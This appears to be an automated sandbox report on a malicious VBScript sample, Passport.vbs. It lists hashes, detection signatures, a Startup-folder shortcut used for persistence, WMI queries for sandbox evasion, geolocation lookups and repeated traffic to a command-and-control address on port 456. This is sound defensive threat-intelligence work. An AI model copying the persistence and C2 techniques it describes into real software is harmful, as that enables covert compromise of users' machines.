Windows Analysis Report
Passport.vbs

Overview

General Information

Sample name:	Passport.vbs
Analysis ID:	1523251
MD5:	a6e8ec20954128687a0534917c8f9ddd
SHA1:	c0bac2548af02d37b18b16bddb39ccd9ea5f0cc2
SHA256:	aca5887474e22b7be6121c56919953745a7a821311080acbe8970da7ed9479b8
Tags:	vbsuser-ankit_anubhav
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

System process connects to network (likely due to code injection or exploit)

VBScript performs obfuscated calls to suspicious functions

AI detected suspicious sample

Potential context-aware VBS script found (checks for environment specific values)

Potential malicious VBS script found (has network functionality)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Sigma detected: WScript or CScript Dropper - File

Uses known network protocols on non-standard ports

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Windows Shell Script Host drops VBS files

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Found WSH timer for Javascript or VBS script (likely evasive script)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check the online IP address of the machine

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Script Initiated Connection

Sigma detected: Startup Folder File Write

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Classification

Signatures

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.7% probability

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49707 version: TLS 1.2

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 34.117.59.81 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 185.244.29.74 456			Jump to behavior

Potential malicious VBS script found (has network functionality)

Source:	Initial file: xx.setrequestheader "User-Agent",gg
Source: C:\Windows\System32\wscript.exe	Dropped file: xx.setrequestheader "User-Agent",gg			Jump to dropped file

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49730

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49706 -> 185.244.29.74:456

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: Joe Sandbox View	ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown

DNS query: name: ipinfo.io

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /org HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /org HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown	TCP traffic detected without corresponding DNS query: 185.244.29.74

Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /org HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /org HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ipinfo.io

Source: unknown

HTTP traffic detected: POST /document HTTP/1.1Accept: */*User-Agent: B81A4609Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.244.29.74:456Content-Length: 0Connection: Keep-AliveCache-Control: no-cache

Source: wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74/
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74/d1
Source: wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74/j
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155696546.00000282CCBC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr	String found in binary or memory: http://185.244.29.74:456/document
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/document&
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/document32
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentB
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentG
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentJ
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentT
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentX
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/document_
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentage:
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentgE
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentnE
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentq
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.244.29.74:456/documentr
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr	String found in binary or memory: https://ipinfo.io/country
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/country6%
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryS
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryW
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryY:
Source: wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/country_
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryq
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/countryz%
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4525760224.00000282CADAD000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr	String found in binary or memory: https://ipinfo.io/org
Source: wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/org_
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49707 version: TLS 1.2

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior

Java / VBScript file with very long strings (likely obfuscated code)

Source: Passport.vbs

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal100.troj.evad.winVBS@2/7@1/2

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Passport.vbs

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs"

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: pesuti.lnk.0.dr

LNK file: ..\..\..\..\..\..\Local\Temp\Passport.vbs

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

